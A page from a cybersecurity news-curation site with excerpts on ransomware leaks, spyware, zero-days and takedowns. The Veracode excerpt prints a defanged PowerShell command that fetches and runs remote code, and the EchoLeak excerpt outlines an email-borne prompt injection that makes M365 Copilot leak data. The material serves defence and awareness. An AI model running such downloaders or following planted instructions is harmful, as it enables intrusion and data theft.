Cyberveillecurated by Decio
Nuage de tags
Mur d'images
Quotidien
Flux RSS
  • Flux RSS
  • Daily Feed
  • Weekly Feed
  • Monthly Feed
Filtres

Liens par page

  • 20 links
  • 50 links
  • 100 links

Filtres

Untagged links
page 6 / 225
Inside the LockBit's Admin Panel Leak: Affiliates, Victims and Millions in Crypto https://www.trellix.com/blogs/research/inside-the-lockbits-admin-panel-leak-affiliates-victims-and-millions-in-crypto/
14/06/2025 22:41:18
QRCode
archive.org

On May 7, 2025, the LockBit admin panel was hacked by an anonymous actor who replaced their TOR website with the text ‘Don’t do crime CRIME IS BAD xoxo from Prague’ and shared a SQL dump of their admin panel database in an archived file ‘paneldb_dump.zip’:

There is not much information available regarding the individual identified as 'xoxo from Prague' whose objective seems to be the apprehension of malicious ransomware threat actors. It is uncommon for a major ransomware organization's website to be defaced; more so for its administrative panel to be compromised. This leaked SQL database dump is significant as it offers insight into the operational methods of LockBit affiliates and the negotiation tactics they employ to secure ransom payments from their victims.

Trellix Advanced Research Center’s investigations into the leaked SQL database confirmed with high confidence that the database originates from LockBit's affiliates admin panel. This panel allows the generation of ransomware builds for victims, utilizing LockBit Black 4.0 and LockBit Green 4.0, compatible with Linux, Windows and ESXi systems, and provides access to victim negotiation chats.

The leaked SQL database dump encompasses data from December 18, 2024 to April 29, 2025, including details pertaining to LockBit adverts (aka ransomware affiliates), victim organizations, chat logs, cryptocurrency wallets and ransomware build configurations.

trellix EN 2025 LockBit Leak Affiliates Crypto research
One-Click RCE in ASUS's Preinstalled Driver Software https://mrbruh.com/asusdriverhub/
14/06/2025 10:10:41
QRCode
archive.org

After ignoring the advice from my friend, I bought a new ASUS motherboard for my PC. I was a little concerned about having a BIOS that would by default silently install software into my OS in the background. But it could be turned off so I figured I would just do that.

DriverHub is an interesting piece of driver software because it doesn’t have any GUI. Instead it’s just a background process that communicates with the website driverhub.asus.com and tells you what drivers to install for your system and which ones need updating. Naturally I wanted to know more about how this website knew what drivers my system needed and how it was installing them, so I cracked open the Firefox network tab.

As I expected, the website uses RPC to talk to the background process running on my system. This is where the background process hosts an HTTP or Websocket service locally which a website or service can connect to by sending an API request to 127.0.0.1 on a predefined port, in this case 53000.

Right about now my elite hacker senses started tingling.

mrbruh EN 2025 ASUS RPC driver-hub Vulnerability Driver
Sweden under cyberattack: Prime minister sounds the alarm - Euractiv https://www.euractiv.com/section/tech/news/sweden-under-cyberattack-prime-minister-sounds-the-alarm/
13/06/2025 15:26:41
QRCode
archive.org
thumbnail

No longer a neutral state, Sweden is now facing a wave of cyberattacks targeting key institutions.
Sweden is under attack, Prime Minister Ulf Kristersson said on Wednesday, following three days of disruptions targeting public broadcaster SVT and other key institutions.

"We are exposed to enormous cyberattacks. Those on SVT have now been recognised, but banks and Bank-id have also been affected," Kristersson told journalists in parliament.

The attacks have been identified as Distributed Denial-of-Service (DDoS) events and disrupted services, raising concerns about the resilience of Sweden’s digital infrastructure.

While Kristersson did not name a specific perpetrator, he referred to earlier reports by the Swedish Security Service, which has identified Russia, China, and Iran as frequent actors behind such cyber operations.

The incidents have heightened concerns about vulnerabilities in Sweden’s cybersecurity systems and underscored the growing threat to critical infrastructure in one of the world’s most connected nations, where over 93% of households have internet access.

Cybersecurity experts have warned that such breaches could escalate, impacting not just digital services, but also public trust.

The attacks come amid heightened geopolitical tensions. Sweden's recent accession to NATO and its support for Ukraine have likely made it a more prominent target for cyberattacks, including those originating from hostile states.

Previously known for its military neutrality, Sweden now faces what Kristersson described earlier this year as a "new and more dangerous reality" since joining NATO in 2024.

As part of its pledge to meeting NATO's 2% of GDP defence spending target, the Swedish government has committed to invest heavily in cybersecurity and military capabilities.

euractiv EN 2025 Sweden DDoS NATO
Predator Spyware Resurgence: Insikt Group Exposes New Global Infrastructure https://www.recordedfuture.com/research/predator-still-active-new-links-identified
13/06/2025 15:20:14
QRCode
archive.org
thumbnail

Following major public exposures by Insikt Group and others throughout the last two years, alongside US government sanctions targeting the Intellexa Consortium — the organizational structure behind the Predator mobile spyware — Insikt Group observed a significant decline in Predator-related activity. This apparent decline raised questions about whether the combination of US sanctions, public exposure, and broader international efforts to curb spyware proliferation, such as the UK and France-led Pall Mall process, had dealt a lasting blow to Intellexa’s operations. Yet, Predator activity has not stopped, and in recent months, Insikt Group has observed a resurgence of activity, reflecting the operators’ continued persistence. While much of the identified infrastructure is tied to known Predator operators in countries previously identified by Insikt Group, a new customer has also been identified in Mozambique — a country not previously publicly linked to the spyware. This aligns with the broader observation that Predator is highly active in Africa, with over half of its identified customers located on the continent. Additionally, Insikt Group has found a connection between high-tier Predator infrastructure and a Czech entity previously associated with the Intellexa Consortium.

  • Insikt Group has identified new infrastructure associated with Predator, indicating continued operations despite public exposure, international sanctions, and policy interventions.
  • The newly identified infrastructure includes both victim-facing Tier 1 servers as well as high-tier components that likely link back to Predator operators in various countries.
  • Although much of Predator’s infrastructure remains consistent with previous reporting, its operators have introduced changes designed to further evade detection — a pattern Insikt Group noted in earlier reporting.
  • Insikt Group has detected Predator-related activity in several countries throughout the last twelve months and is the first to report a suspected Predator operator presence in Mozambique.
  • Insikt Group also connected components of Predator’s infrastructure to a Czech entity previously linked with the Intellexa Consortium by a Czech investigative outlet.
recordedfuture EN 2025 Predator Spyware Resurgence Infrastructure report
Graphite Caught: First Forensic Confirmation of Paragon’s iOS Mercenary Spyware Finds Journalists Targeted https://citizenlab.ca/2025/06/first-forensic-confirmation-of-paragons-ios-mercenary-spyware-finds-journalists-targeted/
12/06/2025 20:43:28
QRCode
archive.org
thumbnail

On April 29, 2025, a select group of iOS users were notified by Apple that they were targeted with advanced spyware. Among the group were two journalists who consented to the technical analysis of their cases. In this report, we discuss key findings from our forensic analyses of their devices.

  • Our analysis finds forensic evidence confirming with high confidence that both a prominent European journalist (who requests anonymity), and Italian journalist Ciro Pellegrino, were targeted with Paragon’s Graphite mercenary spyware.
  • We identify an indicator linking both cases to the same Paragon operator.
  • Apple confirms to us that the zero-click attack deployed in these cases was mitigated as of iOS 18.3.1 and has assigned the vulnerability CVE-2025-43200.
citizenlab EN 2025 Graphite Paragon iOS Mercenary Spyware research
Apple fixes new iPhone zero-day bug used in Paragon spyware hacks https://techcrunch.com/2025/06/12/apple-fixes-new-iphone-zero-day-bug-used-in-paragon-spyware-hacks/
12/06/2025 19:51:27
QRCode
archive.org
thumbnail

Researchers revealed on Thursday that two European journalists had their iPhones hacked with spyware made by Paragon. Apple says it has fixed the bug that was used to hack their phones.

The Citizen Lab wrote in its report, shared with TechCrunch ahead of its publication, that Apple had told its researchers that the flaw exploited in the attacks had been “mitigated in iOS 18.3.1,” a software update for iPhones released on February 10.

Until this week, the advisory of that security update mentioned only one unrelated flaw, which allowed attackers to disable an iPhone security mechanism that makes it harder to unlock phones.

On Thursday, however, Apple updated its February 10 advisory to include details about a new flaw, which was also fixed at the time but not publicized.

“A logic issue existed when processing a maliciously crafted photo or video shared via an iCloud Link. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals,” reads the now-updated advisory.

In the final version of its report published Thursday, The Citizen Lab confirmed this is the flaw used against Italian journalist Ciro Pellegrino and an unnamed “prominent” European journalist

It’s unclear why Apple did not disclose the existence of this patched flaw until four months after the release of the iOS update, and an Apple spokesperson did not respond to a request for comment seeking clarity.

The Paragon spyware scandal began in January, when WhatsApp notified around 90 of its users, including journalists and human rights activists, that they had been targeted with spyware made by Paragon, dubbed Graphite.

Then, at the end of April, several iPhone users received a notification from Apple alerting them that they had been the targets of mercenary spyware. The alert did not mention the spyware company behind the hacking campaign.

On Thursday, The Citizen Lab published its findings confirming that two journalists who had received that Apple notification were hacked with Paragon’s spyware.

It’s unclear if all the Apple users who received the notification were also targeted with Graphite. The Apple alert said that “today’s notification is being sent to affected users in 100 countries.”

techcrunch EN 2025 Apple iPhone zero-day bug Paragon spyware
Éducation nationale : Stormous semble avoir constitué une « combolist » | https://www.lemagit.fr/actualites/366625817/Education-nationale-Stormous-semble-avoir-constitue-une-combolist
12/06/2025 12:39:24
QRCode
archive.org
thumbnail

Coup de tonnerre, en ce mardi 10 juin 2025. Le groupe malveillant Stormous revendique une cyberattaque contre les systèmes de l’Éducation nationale.

Il assure être en possession de données relatives à plus de 40 000 personnes et fournit, pour étayer ses allégations, un échantillon d’un peu moins de 1 400 lignes, soit autant de combinaison login/mot de passe, ou adresse mail/mot de passe. Et tout cela pour une poignée de services en ligne liés à l’Éducation nationale.

Mais cet échantillon suggère surtout que les allégations de Stormous sont fausses.

Nous l’avons confronté aux données de la plateforme Cavalier d’HudsonRock.

La conclusion s’impose rapidement : Stormous a commencé la divulgation d’une combolist vraisemblablement constituée en tout ou partie depuis d’innombrables logs de cleptogiciels (ou infostealers) partagés quotidiennement, gratuitement, et à tous les vents sur de multiples chaînes Telegram plus ou moins spécialisées. De quoi rappeler l’impressionnante liste ALIEN TXTBASE de la fin février.

LeMagIT FR 2025 Stormous combolist cleptogiciels infostealer alien-textbase
Modification de la norme FIDO2: renforcer la sécurité numérique pour les banques suisses et leurs clients https://www.swissbanking.ch/fr/medias-politique/actualites/modification-de-la-norme-fido2-renforcer-la-securite-numerique-pour-les-banques-suisses-et-leurs-clients
12/06/2025 09:40:50
QRCode
archive.org
thumbnail

L’Association suisse des banquiers (ASB) et le "Swiss Financial Sector Cyber Security Centre" (Swiss FS-CSC) sont favorables à la recommandation du comité allemand du secteur bancaire (GBIC) visant à modifier la norme FIDO2 – un changement jugé important, y compris du point de vue suisse, afin de rendre cette norme utilisable pour sécuriser les confirmations de transactions, et pas seulement pour permettre l’authentification lors des connexions.

Le GBIC préconise une extension de la norme FIDO2 afin de permettre l’affichage sécurisé des données de transaction par l’authentificateur. Actuellement, la norme est essentiellement axée sur la connexion à des plateformes et à des systèmes ainsi que sur l’utilisation du navigateur à des fins d’affichage. Le GBIC demande toutefois l’extension de la norme afin qu’elle puisse être utilisée pour un spectre plus large de transactions et d’activités. Dans le secteur bancaire, cela concerne principalement les services bancaires en ligne et les paiements par carte.

Nous sommes favorables à la proposition du GBIC visant à modifier la norme FIDO2. Nous sommes convaincus que cette modification serait également bénéfique pour le secteur bancaire suisse, car elle permettrait une utilisation plus large de FIDO2, au-delà de l’authentification lors des connexions. L’ASB et le Swiss FS-CSC soutiennent donc la proposition du GBIC visant à:

  • Transmettre les données de transaction à l’authentificateur: au lieu de l’envoi d’une simple valeur de hachage, les données complètes de la transaction seraient transmises à l’authentificateur externe.
  • Intégrer un affichage sécurisé: les authentificateurs avec affichage devraient être étendus de manière à présenter aux utilisateurs les données de transaction transmises, que ceux-ci pourraient ensuite vérifier.
  • Lier le code d’authentification aux données affichées: le code d’authentification généré par l’authentificateur devrait inclure une valeur de hachage calculée par l’authentificateur pour les données affichées, de façon à ce que le code d’authentification soit lié de manière sécurisée à ces données. Cela permettrait à la banque de vérifier la sécurité de l’affichage et la confirmation des données de la transaction.
  • Étendre la spécification CTAP: l’Alliance FIDO devrait étendre le protocole "Client à Authentificateur" (CTAP) afin d’y inclure une interface normalisée pour la transmission et l’affichage des données de transaction.
swissbanking FIDO2 2025 FR Suisse banquiers norme GBIC avis Suisse
That DeepSeek installer you just clicked? It's malware https://www.theregister.com/2025/06/11/deepseek_installer_or_infostealing_malware/
12/06/2025 09:19:50
QRCode
archive.org
thumbnail

Suspected cybercriminals have created a fake installer for Chinese AI model DeepSeek-R1 and loaded it with previously unknown malware called "BrowserVenom".

The malware’s name reflects its ability to redirect all traffic from browsers through an attacker-controlled server.

This enables the crooks to steal data, monitor browsing activity, and potentially expose plaintext traffic. Credentials for websites, session cookies, financial account info, plus sensitive emails and documents are therefore all at risk – just the sort of info scammers seek so they can commit digital fraud and/or sell to other miscreants.

To date, the malware has infected "multiple" computers across Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. Kaspersky, which spotted a phishing campaign that spreads the malware by sending victims to a fake website that resembles the real DeepSeek homepage, said it continues to "pose a global threat.”
While the malware used in this campaign is new, the tactic of using interest in AI to spread nasty payloads is increasingly common.

Such campaigns use phishing sites whose domain names differ slightly from those operated by real AI vendors, and criminals use malicious ads and other tactics, so they appear prominently in search engine results. But instead of delivering the promised chatbot or AI tool, they infect unwitting victims with everything from credential- and wallet-stealing malware to ransomware and Windows-borking code.

This campaign used the URL https[:]//deepseek-platform[.]com.

The crims promoted that address to many potential victims by buying ads from Google, so it appeared as the top result when users searched for "deepseek r1".

theregister EN 2025 BrowserVenom malware DeepSeek fake installer
Hackers exploited Windows WebDav zero-day to drop malware https://www.bleepingcomputer.com/news/security/stealth-falcon-hackers-exploited-windows-webdav-zero-day-to-drop-malware/
12/06/2025 08:55:48
QRCode
archive.org
thumbnail

An APT hacking group known as 'Stealth Falcon' exploited a Windows WebDav RCE vulnerability in zero-day attacks since March 2025 against defense and government organizations in Turkey, Qatar, Egypt, and Yemen.

Stealth Falcon (aka 'FruityArmor') is an advanced persistent threat (APT) group known for conducting cyberespionage attacks against Middle East organizations.

The flaw, tracked under CVE-2025-33053, is a remote code execution (RCE) vulnerability that arises from the improper handling of the working directory by certain legitimate system executables.
Specifically, when a .url file sets its WorkingDirectory to a remote WebDAV path, a built-in Windows tool can be tricked into executing a malicious executable from that remote location instead of the legitimate one.

This allows attackers to force devices to execute arbitrary code remotely from WebDAV servers under their control without dropping malicious files locally, making their operations stealthy and evasive.

The vulnerability was discovered by Check Point Research, with Microsoft fixing the flaw in the latest Patch Tuesday update, released yesterday.

bleepingcomputer EN 2025 CVE-2025-33053 Patch-Tuesday Actively-Exploited Espionage Remote-Code-Execution Stealth-Falcon Vulnerability WebDAV Windows Zero-Day
Echoleak Blogpost https://www.aim.security/lp/aim-labs-echoleak-blogpost
12/06/2025 07:30:49
QRCode
archive.org
thumbnail
  • Aim Labs has identified a critical zero-click AI vulnerability, dubbed “EchoLeak”, in Microsoft 365 (M365) Copilot and has disclosed several attack chains that allow an exploit of this vulnerability to Microsoft's MSRC team.
  • This attack chain showcases a new exploitation technique we have termed "LLM Scope Violation" that may have additional manifestations in other RAG-based chatbots and AI agents. This represents a major research discovery advancement in how threat actors can attack AI agents - by leveraging internal model mechanics.
  • The chains allow attackers to automatically exfiltrate sensitive and proprietary information from M365 Copilot context, without the user's awareness, or relying on any specific victim behavior.
  • The result is achieved despite M365 Copilot's interface being open only to organization employees.
  • To successfully perform an attack, an adversary simply needs to send an email to the victim without any restriction on the sender's email.
  • As a zero-click AI vulnerability, EchoLeak opens up extensive opportunities for data exfiltration and extortion attacks for motivated threat actors. In an ever evolving agentic world, it showcases the potential risks that are inherent in the design of agents and chatbots.
  • Aim Labs continues in its research activities to identify novel types of vulnerabilities associated with AI deployment and to develop guardrails that mitigate against such novel vulnerabilities.
    Aim Labs is not aware of any customers being impacted to date.
    TL;DR
    Aim Security discovered “EchoLeak”, a vulnerability that exploits design flaws typical of RAG Copilots, allowing attackers to automatically exfiltrate any data from M365 Copilot’s context, without relying on specific user behavior. The primary chain is composed of three distinct vulnerabilities, but Aim Labs has identified additional vulnerabilities in its research process that may also enable an exploit.
aim.security EN 2025 research vulnerability zero-click AI EchoLeak M365 Copilot LLM-Scope-Violation
Down the Rabbit Hole of Unicode Obfuscation https://www.veracode.com/blog/down-the-rabbit-hole-of-unicode-obfuscation/
11/06/2025 16:36:34
QRCode
archive.org
thumbnail

Hidden under layers of obfuscation, an npm package delivers a remote access tool. Application Security for the AI Era
In the ever-vigilant effort to secure the open-source ecosystem, Veracode’s continuous monitoring systems recently flagged a pair of npm malware packages—solders and @mediawave/lib. The malicious behavior, however, is not at all obvious at first because of a layer of unusual Unicode obfuscation that caught our attention. Our investigation focused on the solders package, which leverages a common yet critical attack vector: a postinstall script in its package.json. This hook means that simply installing the package is enough to trigger its hidden malicious payload.

Upon inspection, the target lib.js file presented itself not as typical code, but as a dizzying wall of Unicode characters, predominantly Japanese Katakana and Hiragana. This was far more than simple character substitution; it was the entry point to an extremely layered and complex malicious attack chain. What began as an analysis of a single, clever JavaScript obfuscation technique quickly spiraled into a deep-dive that traversed multiple programming languages, downloader stages, and even steganography. Join us as we peel back each layer of this remarkably elaborate attack, following the trail from a few cryptic symbols all the way down to its final RAT payload.

TL;DR
If you’re just here for the highlights and want to see the full, multi-layered attack chain in a concise format, please scroll down to the “Recap: The Anatomy of a Multi-Layered Attack” section. There, we detail each of the twelve layers we had to unravel to get to the bottom of this threat.

This investigation revealed a remarkably deep and complex attack chain. To fully appreciate the attacker’s efforts to evade detection, here is a step-by-step summary of the layers we unraveled:

Layer 1: NPM postinstall Hook: The attack begins with a standard postinstall script in the package.json file, automatically executing the malware upon installation.
Layer 2: Unicode Obfuscated JavaScript: The initial lib.js payload is obfuscated using Japanese Hiragana and Katakana characters as variable names, making static analysis nearly impossible at a glance.
Layer 3: Dynamically Reconstructed JavaScript: This Unicode script is not a direct payload, but a program designed to dynamically build primitives (e.g., ‘t’, ‘r’, ‘u’, ‘e’) and reconstruct the Function constructor from scratch.
Layer 4: Second-Stage Obfuscated JavaScript: The Unicode layer dynamically assembles and executes a second, more traditionally obfuscated JavaScript payload that uses array shuffling and hex encoding.
Layer 5: PowerShell Downloader: Once deobfuscated, the JavaScript’s sole purpose is to execute a short PowerShell command (iwr firewall[.]tel | iex) to download and execute the next stage from a remote server.
Layer 6: Binary-Encoded PowerShell Script: The script hosted at firewall[.]tel is itself obfuscated, with the payload encoded as arrays of binary strings that are converted to ASCII characters and executed.
Layer 7: Base64-Encoded PowerShell Script: Deobfuscating the binary strings reveals another PowerShell script. This one uses Base64 encoding to hide its commands which include adding Windows Defender exclusions and downloading a malicious batch file.
Layer 8: Obfuscated Batch File: The downloaded output.bat (nearly 1MB in size) uses extensive obfuscation, setting hundreds of random environment variables and then concatenating them in a specific order.
Layer 9: Encrypted & Compressed .NET DLL: The batch script’s true payload is a Base64-encoded, 3DES-encrypted, and Gzip-compressed .NET DLL, which is reconstructed and loaded directly into memory.
Layer 10: Steganography: This first .NET DLL is not the final payload. It reaches out to a 3MB PNG image file hosted online and uses steganography techniques to extract hidden data from the image.
Layer 11: Second .NET DLL (The RAT): The data extracted from the image is used to build a second .NET DLL in memory.
Layer 12: Final Payload Deployment: This final DLL is the Pulsar RAT, a remote administration tool that gives the attacker full control over the victim’s machine.

veracode EN 2025 Unicode Obfuscation
20,000 malicious IPs and domains taken down in INTERPOL infostealer crackdown https://www.interpol.int/fr/Actualites-et-evenements/Actualites/2025/20-000-malicious-IPs-and-domains-taken-down-in-INTERPOL-infostealer-crackdown
11/06/2025 16:33:08
QRCode
archive.org
thumbnail

41 servers seized and 32 suspects arrested during Operation Secure.

More than 20,000 malicious IP addresses or domains linked to information stealers have been taken down in an INTERPOL-coordinated operation against cybercriminal infrastructure.

During Operation Secure (January – April 2025) law enforcement agencies from 26 countries worked to locate servers, map physical networks and execute targeted takedowns.

Ahead of the operation, INTERPOL cooperated with private-sector partners Group-IB, Kaspersky and Trend Micro to produce Cyber Activity Reports, sharing critical intelligence with cyber teams across Asia. These coordinated efforts resulted in the takedown of 79 per cent of identified suspicious IP addresses.

Participating countries reported the seizure of 41 servers and over 100 GB of data, as well as the arrest of 32 suspects linked to illegal cyber activities.

Infostealer malware is a primary tool for gaining unauthorized access to organizational networks. This type of malicious software extracts sensitive data from infected devices, often referred to as bots. The stolen information typically includes browser credentials, passwords, cookies, credit card details and cryptocurrency wallet data.

Additionally, logs harvested by infostealers are increasingly traded on the cybercriminal underground and are frequently used as a gateway for further attacks. These logs often enable initial access for ransomware deployments, data breaches, and cyber-enabled fraud schemes such as Business Email Compromise (BEC).

Following the operation, authorities notified over 216,000 victims and potential victims so they could take immediate action - such as changing passwords, freezing accounts, or removing unauthorized access.
Vietnamese police arrested 18 suspects, seizing devices from their homes and workplaces. The group's leader was found with over VND 300 million (USD 11,500) in cash, SIM cards and business registration documents, pointing to a scheme to open and sell corporate accounts.

As part of their respective enforcement efforts under Operation Secure, house raids were carried out by authorities in Sri Lanka and Nauru. These actions led to the arrest of 14 individuals - 12 in Sri Lanka and two in Nauru - as well as the identification of 40 victims.

The Hong Kong Police analysed over 1,700 pieces of intelligence provided by INTERPOL and identified 117 command-and-control servers hosted across 89 internet service providers. These servers were used by cybercriminals as central hubs to launch and manage malicious campaigns, including phishing, online fraud and social media scams.

Neal Jetton, INTERPOL’s Director of Cybercrime, said:

“INTERPOL continues to support practical, collaborative action against global cyber threats. Operation Secure has once again shown the power of intelligence sharing in disrupting malicious infrastructure and preventing large-scale harm to both individuals and businesses.”

Notes to editors

Operation Secure is a regional initiative organized under the Asia and South Pacific Joint Operations Against Cybercrime (ASPJOC) Project.

Participating countries: Brunei, Cambodia, Fiji, Hong Kong (China), India, Indonesia, Japan, Kazakhstan, Kiribati, Korea (Rep of), Laos, Macau (China), Malaysia, Maldives, Nauru, Nepal, Papua New Guinea, Philippines, Samoa, Singapore, Solomon Islands, Sri Lanka, Thailand, Timor-Leste, Tonga, Vanuatu, Vietnam.

interpol EN 2025 operation-secure infostealer crackdown Asia
Microsoft Outlook to block more risky attachments used in attacks https://www.bleepingcomputer.com/news/security/microsoft-outlook-to-block-more-risky-attachments-used-in-attacks/
11/06/2025 16:25:29
QRCode
archive.org
thumbnail

Microsoft announced it will expand the list of blocked attachments in Outlook Web and the new Outlook for Windows starting next month.

Microsoft announced it will expand the list of blocked attachments in Outlook Web and the new Outlook for Windows starting next month.

The company said on Monday in a Microsoft 365 Message Center update that Outlook will block .library-ms and .search-ms file types beginning in July.

"As part of our ongoing efforts to enhance security in Outlook Web and the New Outlook for Windows, we're updating the default list of blocked file types in OwaMailboxPolicy," Microsoft said. "Starting in early July 2025, the [.library-ms and .search-ms] file types will be added to the BlockedFileTypes list."

bleepingcomputer EN 2025 Microsoft New-Outlook Outlook Outlook-on-the-web Windows
Telegram, the FSB, and the Man in the Middle https://istories.media/en/stories/2025/06/10/telegram-fsb/
11/06/2025 16:22:18
QRCode
archive.org
thumbnail

The technical infrastructure that underpins Telegram is controlled by a man whose companies have collaborated with Russian intelligence services. An investigation by IStories

Telegram, the wildly popular chat and messaging app, is the pride of the Russian IT industry. According to Pavel Durov, the enigmatic entrepreneur who created the service twelve years ago, it now has over a billion monthly active users around the world.

Among the reasons for this success is Telegram’s reputation for security, coupled with Durov’s image as a free speech champion who has defied multiple governments.

“Unlike some of our competitors, we don’t trade privacy for market share,” he wrote this April. “In its 12-year history, Telegram has never disclosed a single byte of private messages.”

But IStories’ new investigation reveals a critical vulnerability.

When we investigated who controls the infrastructure that keeps Telegram’s billions of messages flowing, we found a man with no public profile but unparalleled access: Vladimir Vedeneev, a 45-year-old network engineer.

Vedeneev owns the company that maintains Telegram’s networking equipment and assigns thousands of its IP addresses. Court documents show that he was granted exclusive access to some of Telegram’s servers and was even empowered to sign contracts on Telegram’s behalf.

There is no evidence that this company has worked with the Russian government or provided any data. But two other closely linked Vedeneev companies — one of which also assigns Telegram IP addresses, and another which did so until 2020 — have had multiple highly sensitive clients tied to the security services. Among their clients is the FSB intelligence agency; a secretive “research computing center” that helped plan the invasion of Ukraine and developed tools to deanonymize internet users; and a flagship state-owned nuclear research laboratory.

Without you, there is no us
Support IStories — it helps us to continue telling the truth
Donate
“If true, this reporting highlights the dangerous disconnect between what many believe about Telegram’s security and privacy features, and the reality," said John Scott-Railton, a Senior Researcher at The Citizen Lab. "When people don't know what is actually going on, but assume they have metadata privacy, they can unknowingly make risky choices, bringing danger to themselves and the people they’re communicating with. This is doubly true if the Russian government sees them as a threat."

A Ukrainian IT specialist who spoke with IStories on condition of anonymity said that the Russian military has used “man-in-the-middle” type surveillance in his country after capturing network infrastructure.

"You get physical access to the data transmission channel and install your equipment there,” he said. “In such an attack, the hackers aren’t even interested so much in the user's correspondence. They get metadata to analyze. And that means IP addresses, user locations, who exchanges data packets with whom, the kind of data it is… really, all possible information.”

Durov is currently under investigation in France after being arrested last August on charges related to the circulation of illegal content on Telegram. The company has since implemented a number of measures to crack down and step up its collaboration with the authorities. Durov has been released under judicial supervision and is allowed to travel.

He did not reply to requests for comment. Vedeneev spoke with IStories but declined to make any of his comments public.

istories.media 2025 EN Telegram FSB Russia contrctor investigation
Account compromise leads to crash records data breach https://www.txdot.gov/about/newsroom/statewide/account-compromise-leads-to-crash-records-data-breach.html
11/06/2025 16:18:37
QRCode
archive.org

A compromise of an account has led to improper downloads of a large number of crash records, and the Texas Department of Transportation (TxDOT) is working to notify those affected.

On May 12, 2025, TxDOT identified unusual activity in its Crash Records Information System (CRIS). Further investigation revealed the activity originated from an account that was compromised and used to improperly access and download nearly 300,000 crash reports. TxDOT immediately disabled access from the compromised account.

Personal information included in crash records may contain: first and last name, mailing and/or physical address, driver license number, license plate number, car insurance policy number and other information. Notification, in this case, is not required by law, but TxDOT has taken proactive steps to inform the public by sending letters to notify the impacted individuals whose information was included in the crash reports.

If you received
a
letter about this matter, please call the dedicated assistance line at 1-833-918-5951 (toll-free), Monday through Friday, from 8 a.m. – 8 p.m. Central Time (excluding U.S. holidays). Please be prepared to provide the engagement number included in the letter.

TxDOT is implementing additional security measures for accounts to help prevent similar incidents in the future. The compromise is under investigation.

txdot.gov Texas account compromise crash records
Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/
11/06/2025 16:08:37
QRCode
archive.org
thumbnail

This report uncovers a set of related threat clusters linked to PurpleHaze and ShadowPad operators targeting organizations, including cybersecurity vendors.

  • In October 2024, SentinelLABS observed and countered a reconnaissance operation targeting SentinelOne, which we track as part of a broader activity cluster named PurpleHaze.
  • At the beginning of 2025, we also identified and helped disrupt an intrusion linked to a wider ShadowPad operation. The affected organization was responsible for managing hardware logistics for SentinelOne employees at the time.
  • A thorough investigation of SentinelOne’s infrastructure, software, and hardware assets confirmed that the attackers were unsuccessful and SentinelOne was not compromised by any of these activities.
  • The PurpleHaze and ShadowPad activity clusters span multiple partially related intrusions into different targets occurring between July 2024 and March 2025. The victimology includes a South Asian government entity, a European media organization, and more than 70 organizations across a wide range of sectors.
  • We attribute the PurpleHaze and ShadowPad activity clusters with high confidence to China-nexus threat actors. We loosely associate some PurpleHaze intrusions with actors that overlap with the suspected Chinese cyberespionage groups publicly reported as APT15 and UNC5174.
  • This research underscores the persistent threat Chinese cyberespionage actors pose to global industries and public sector organizations, while also highlighting a rarely discussed target they pursue: cybersecurity vendors.
sentinelone EN 2025 China PurpleHaze ShadowPad APT15 UNC5174
Eggs in a Cloudy Basket: Skeleton Spider’s Trusted Cloud Malware Delivery - DomainTools Investigations | DTI https://dti.domaintools.com/skeleton-spider-trusted-cloud-malware-delivery/
10/06/2025 18:56:48
QRCode
archive.org

Discover how the FIN6 cybercrime group, also known as Skeleton Spider, leverages trusted cloud services like AWS to deliver stealthy malware through fake job applications and resume-themed phishing campaigns. Learn about their tactics, infrastructure, and how to defend against these evolving threats.

Skeleton Spider, also known as FIN6, is a long-running financially motivated cybercrime group that has continually evolved its tactics to maximize impact and profit. While the group initially gained notoriety for point-of-sale (POS) breaches and large-scale payment card theft, it has since shifted to broader enterprise threats, including ransomware operations.

In recent years, FIN6 has sharpened its focus on social engineering campaigns that exploit professional trust. By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware. One of their preferred payloads is more_eggs, a stealthy JavaScript-based backdoor that facilitates credential theft, system access, and follow-on attacks, including ransomware deployment.

This research combines technical insights and practical analysis for both general audiences and cybersecurity professionals. We examine how FIN6 uses trusted cloud services, such as AWS, to host malicious infrastructure, evade detection, and ultimately deploy malware through socially engineered lures.

domaintools EN 2025 FIN6 cybercrime Skeleton-Spider Skeleton-Spider
NGO warns FSB has gained access to Russians’ communication with Ukrainian Telegram channel bots — Novaya Gazeta Europe https://novayagazeta.eu/articles/2025/06/07/ngo-warns-fsb-has-gained-access-to-russians-communication-with-ukrainian-telegram-channel-bots-en-news
09/06/2025 23:43:53
QRCode
archive.org
thumbnail

Russia’s Federal Security Service (FSB) has learned to intercept messages sent by Russians to bots or feedback accounts associated with certain Ukrainian Telegram channels, potentially exposing anyone communicating with such outlets to treason charges, Russian human rights NGO First Department warned on Friday.

Russia’s principal domestic intelligence agency has gained access to correspondence made with Ukrainian Telegram channels including Crimean Wind and Vision Vishnun, according to First Department, which said that the FSB’s hacking of Ukrainian Telegram channels had come about during a 2022 investigation into the Ukrainian intelligence agencies “gathering information that threatens the security of the Russian Federation” via messengers and social networks including Telegram.

The case is being handled by the FSB’s investigative department, though no suspects or defendants have been named in the case, according to First Department.

When the FSB identifies individual Russian citizens who have communicated with or transmitted funds to certain Ukrainian Telegram channels, it contacts the FSB office in their region, which then typically opens a criminal case for treason against the implicated person.

“We know that by the time the defendants in cases of ‘state treason’ are detained, the FSB is already in possession of their correspondence. And the fact that neither defendants nor a lawyer are named in the main case allows the FSB to hide how exactly it goes about gaining access to that correspondence,” First Department said.

novayagazeta EN Russia Telegram FSB intercept
Splunk Universal Forwarder on Windows Lets Non-Admin Users Access All Contents https://cybersecuritynews.com/splunk-universal-forwarder-vulnerability/
09/06/2025 23:41:02
QRCode
archive.org
thumbnail

A high-severity vulnerability was uncovered in Splunk Universal Forwarder for Windows that compromises directory access controls.

The flaw, designated CVE-2025-20298 with a CVSSv3.1 score of 8.0, affects multiple versions of the software and poses significant security risks to enterprise environments relying on Splunk’s data forwarding capabilities.

The vulnerability stems from incorrect permission assignment during the installation or upgrade of Universal Forwarder for Windows.
This security flaw is classified under CWE-732 (Incorrect Permission Assignment for Critical Resource), indicating a fundamental issue with access control mechanisms.

